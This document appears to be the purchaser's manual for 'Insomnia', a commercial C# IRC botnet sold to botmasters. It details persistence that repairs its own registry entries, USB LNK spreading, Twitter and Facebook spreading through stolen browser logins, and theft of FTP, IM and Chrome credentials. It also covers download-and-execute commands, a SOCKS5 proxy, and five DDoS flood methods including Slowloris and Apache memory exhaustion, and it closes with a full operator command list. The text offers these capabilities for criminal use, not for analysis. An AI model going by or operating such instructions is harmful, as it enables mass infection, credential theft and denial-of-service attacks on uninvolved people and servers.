Table of Contents
1. Summary
2. Core Features
3. Malware Removal
4. SOCKS5
5. DDoS
6. Spreading Modules
7. Topic Generator Explained
8. Complete command list
Summary
Insomnia was developed in Visual Studio 2010 using the C# language. The binary is
compiled under the 2.0 distribution of the .NET Framework. Insomnia was primarily
designed for the botmaster who plans to build a network with machines that have the
.NET framework installed. During development, the infection of newer operating
systems was considered, and Insomnia is fully compatible with Windows 8 Development
Preview at this time, and should work fine on the release builds.
Insomnia has been tested to function on Windows NT based operating systems,
specifically the following:
Windows XP
Windows Server 2003 / R2
Windows Vista
Windows Server 2008 / R2
Windows 7
Windows 8 Development Preview
If Insomnia acquires administrative rights on the target machine, it will install to
HKLM rather than HKCU, allowing it to be executed under all user accounts on the
machine. It will also make use of specific Windows API calls that only function under
elevated permissions, improving the functionality of some malware removal features
such as Ruskill.
Upon execution, Insomnia gathers it’s country location from http://api.wipmania.com.
If for some reason this website can’t be accessed, Insomnia will default to system
locale information.
Insomnia’s nick generation pattern is based on a series of information. Here is a
breakdown:
n{US|XP-32a}dnskifj
The lowercase ‘n’ in the nick signifies that Insomnia has recently been
installed within the past hour, implying that it is most likely a new
installation.
The next part is the GeoIP location of the PC Insomnia is running on. US being
United States.
This is followed by the version of windows (Windows XP 32 bit), and the
lowercase ‘a’ signifies that the bot is running with administrative
privileges. If the bot is only running as a standard user, it will show a
lowercase ‘u’ instead.
The rest of the nick is made up of seven randomly generated characters to
avoid nick collision.
Core Features
Connection Information
Insomnia supports the IRC protocol along with SSL (Secure-Socket-Layer) connections.
SSL is recommended, as the downside to normal IRC connections is that they are easily
recognized. Using normal connections can put Insomnia at risk of detection, while
exposing information that is exchanged on your network.
Insomnia may be compiled to support connections to multiple servers at request. There
is no limit at this time.
Quit Messages
IRC quit messages are decided by listening to WM_QUERYENDSESSION. This lets insomnia
include the reason the process is terminating, if it is related to a Windows session
attempting to close. If the bot process is terminated abnormally or fails to acquire
a reason, it will be the standard ‚Connection reset by peer‛. Currently Insomnia
detects and outputs three types of quit messages:
Windows is shutting down…
Windows is logging off…
Windows is going to sleep…
Registry Persistence
Insomnia actively monitors the registry for changes, by pinvoking a series of Windows
API functions such as RegNotifyKeyChangeValue. If it finds out that its registry key
was modified or deleted, it will fix it immediately.
Core command list
These commands signify features that are found in the basic compile of Insomnia, and
are included in every binary available for purchase, without the addition of separate
modules.
Command
.v
.m on/off
.avinfo
.j #channel
.p #channel
.sort
.unsort
.permsort
.rm
.rc
.ftp
.im
.read URL
.open FILE/URL
.open FILE/URL –h
.dl URL
.dl URL –m
.dl URL –t X
The rest of the commands are discussed in their appropriate sections below. You can find a
complete command list on the very last page of this document.
Description
Outputs version, MD5 hash, process path, registry location.
Toggles mute (blocks all output).
Display current Antivirus/Firewall programs installed. (Vista+)
Joins a channel.
Parts a channel.
Sorts bots into channels based on their country. (#US, #RU, etc).
Parts the sorted channels.
Sorts the bots based on privileges. (#users/#admins).
Completely removes Insomnia from the machine.
Reconnects to IRC after waiting 10 seconds.
Outputs saved FTP credentials on the machine.
Outputs saved IM credentials on the machine.
Reads encrypted topic commands from a remote URL
Opens a URL or file on machine.
Opens a URL or file on the machine but hides the window.
Downloads a file and executes it.
Downloads a file and executes it in memory (.NET files only)
Downloads a file and terminates after X seconds have passed.
Malware Removal
Botkiller
Insomnia includes two types of malware removal commands. Those are as follows:
Description
Runs the standard botkiller module.
Runs the botkiller module that terminates injected bots.
The standard botkiller module works around a counter system. It first scans temporary
folders, including %APPDATA% for any executable files that are currently running. It
then checks if the files have a ‚hidden‛ attribute or not. Other checks are then
performed including checking the registry startup locations. If an executable program
violates a certain number of these checks, it’s safe to consider it ‚possibly
malicious‛, and Insomnia will then terminate it, delete the registry key, and output
and TCP connections associated with that process.
The botkiller module that terminates injected bots uses a series of techniques to
remove nearly all bots that inject into explorer/iexplore.
Both of these commands perform different actions. If you want to give the best effort
to clean a system from other common malware, it’s recommended you run both of these
commands.
Command
.dl URL -r
Description
Starts the download and initiates the Ruskill module on the file.
Ruskill is initiated by calling the download function with the ‘r’ parameter.
Files downloaded with Ruskill enabled will be monitored and information will be
outputted to the Ruskill channel.
Ruskill attempts to discover all files dropped by that malware along with all
registry keys created, and then reverse those changes the next time the PC reboots.
It uses a set of Windows API calls to make this possible, deleting target files after
AUTOCHK but before Windows creates any page files. Administrative rights can affect
how well this feature works.
Ruskill uses API calls similar to those in ngrBot/Autumn/Other Antivirus/File
Assassin software.
DDoS Functionality
Insomnia includes five different methods to initiate distributed denial of service
attacks. Two methods are primarily aimed at exploiting vulnerabilities in the Apache
web server, by consuming all sockets and resources.
While initiating a DDoS command, insomnia will stop all other active DDoS threads
before starting. This helps allocate threads for the new DDoS command while not
consuming too many resources client-side, and saturating the upstream (which may
cause the bot to disconnect temporarily).
Command
.arme HOST TIME
.slow HOST TIME
.layer4 HOST PORT TIME
.layer7 HOST PORT TIME
.udp HOST PORT TIME
Description
Multithreaded
Multithreaded
Multithreaded
Multithreaded
Multithreaded
Apache Remote Memory Exhaustion flood.
Slowloris Flood
Layer4 (SYN) Flood
Layer7 (HTTP GET) Flood
UDP Flood
ARME (Apache Remote Memory Exhaustion)
This method was discovered in late 2011 and is a modified port of the perl script by
Kingcope. Running this with enough connections can actually cause Apache to swap
memory to file system after RAM is consumed, and may result in the process being
terminated as the host system becomes unstable. Higher-end servers or properly
modified/configured Apache installations may not be vulnerable.
Slowloris
This method was developed by RSNAKE and made popular in 2009. This C# port works in
the exact same way but with random user agents, random content length, and random
header data so it's even harder to block from the host machine. It also uses GET and
POST to do the attack which seems to have better results than sticking with just one
method. Slowloris can take a while to consume all the sockets on the host machine,
but it always wins in the end.
This method simply does an HTTP GET request on the index page, and downloads the page
data. Works good in high numbers. If you are focusing attacks on Apache webservers
with small numbers, then the methods above are recommended.
This method uses SynSockets to flood the server with TCP connections. It's not too
hard to block server-side and is an older method, but if a server is vulnerable then
it's highly effective.
This flood is ideal for neighborhood connections or larger servers if you have the
manpower to do it, flooding with UDP packets containing random data.
SOCKS5 Module
Description
Attempts to start the SOCKS5 server and report back with results.
This command will signal Insomnia to start the SOCKS5 server and attempt to test it’s
connection. If everything worked out with no errors, it will output the IP:PORT
USER:PASS to IRC so you are able to use them. It also attempts to map ports with the
included uPnP library. If it succeeds it will signify it in the output.
<n{US|W7-64u}dnsmdks> [SOCKS]: Attempting to start SOCKS server…
<n{US|W7-64u}dnsmdks> [SOCKS]: Listening on [127.0.0.1:9001] [user:pass] [uPnP=yes]
Spreaders
USB .LNK Spread
This module runs automatically. Upon initial bot execution it scans for USB Removable
Media. When found, it scans the drive for folders, creating appropriate LNK files and
hiding the originals. It also listens for new devices and infects them as they are
added. This module will output to IRC after a successful infection.
<n{US|W7-64u}dnsmdks> [USB]: Completed LNK spread on (G:\) with 7 files.
Twitter
Command
.twitter “msg”
This module queries the chrome grabber for accounts that fit twitter.com, and
attempts to login. If the login was a success, it proceeds to update the status to
the specified message. This does NOT use the Twitter API and does NOT require OAuth.
It simulates the http web requests made by a real browser to login to twitter and
update the status.
<n{US|W7-64u}dnsmdks> [TWITTER]: Status updated. (user@email.com => ‚msg‛ )
Description
Updates twitter status on the system.
Facebook
Command
.facebook “msg”
This module queries the chrome grabber for accounts that fit facebook.com, and
attempts to login. If the login was a success, it proceeds to gather information
about the Facebook account required to login to the Facebook chat system via the XMPP
protocol. Once the data is acquired, resources are disposed of and a chat session is
initiated with the user's credentials. Once the module has access to the chat system,
it will begin to send the message you provided with the given options.
You can specify to send to only online/offline friends with the parameters above. You
can also specify to send to a certain number of friends (the friends will be randomly
chosen), by using the –f parameter followed by a number of your choice.
<n{US|W7-64u}dnsmdks> [FACEBOOK]: Spreader module started. (user@email.com => ‚msg‛)
Description
Starts facebook spread module with specified message.
Topic Generator
Insomnia comes with a topic generation utility to help you secure your topic commands
from prying eyes, and simplify commands that should be performed in sequential order.
To use, please run the topic generator that was included with your purchase. Each
customer gets a topic generator that encrypts based on your unique customer ID, so no
one else with the topic generator could interact with your binary, compiled with the
same customer ID.
To use the Topic Generator, simply type in the commands exactly how you would in IRC,
then click Add. The topic generator will add them to the listview, automatically
parsing and detecting the parameters.
When you are all finished, click Generate, and use the topic in IRC. If a topic is
too big for the IRC topic character limit, you can host the encrypted commands and
set the topic to the encrypted version of .read http://yoururl.com/commands.txt
Complete Command List
.m on/off
.avinfo
.j #channel
.p #channel
.sort
.unsort
.permsort
.rm
.rc
.ftp
.im
.read URL
.open FILE/URL
.open FILE/URL –h
.dl URL
.dl URL –m
.dl URL –t X
.dl URL –r
.socks
.speedtest URL
.bk
.bk –i
.getadmin
.acc keyword
.arme HOST TIME
.slow HOST TIME
.layer4 HOST PORT TIME
.layer7 HOST PORT TIME
.udp HOST PORT TIME
Description
Outputs version, MD5 hash, process path, registry
location.
Toggles mute (blocks all output).
Display current Antivirus/Firewall programs installed.
(Vista+)
Joins a channel.
Parts a channel.
Sorts bots into channels based on their country. (#US,
#RU, etc).
Parts the sorted channels.
Sorts the bots based on privileges. (#users/#admins).
Completely removes Insomnia from the machine.
Reconnects to IRC after waiting 10 seconds.
Outputs saved FTP credentials on the machine.
Outputs saved IM credentials on the machine.
Reads encrypted topic commands from a remote URL
Opens a URL or file on machine.
Opens a URL or file on the machine but hides the window.
Downloads a file and executes it.
Downloads a file and executes it in memory (.NET files
only)
Downloads a file and terminates after X seconds have
passed.
Downloads a file with Ruskill and outputs to Ruskill
channel.
Attempts to start SOCKS5 server
Download the URL and output speed information.
Standard botkiller module
Injected botkiller module
Added by request. Prompts UAC for admin, if acquires,
restarts.
Chrome grabber based on url keyword. Leave keyword blank
for all.
Multithreaded Apache Remote Memory Exhaustion flood.
Multithreaded Slowloris Flood
Multithreaded Layer4 (SYN) Flood
Multithreaded Layer7 (HTTP GET) Flood
Multithreaded UDP Flood